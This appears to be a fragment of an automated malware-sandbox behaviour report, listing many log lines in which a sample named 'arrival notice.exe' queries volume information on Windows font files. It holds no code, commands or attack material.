          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
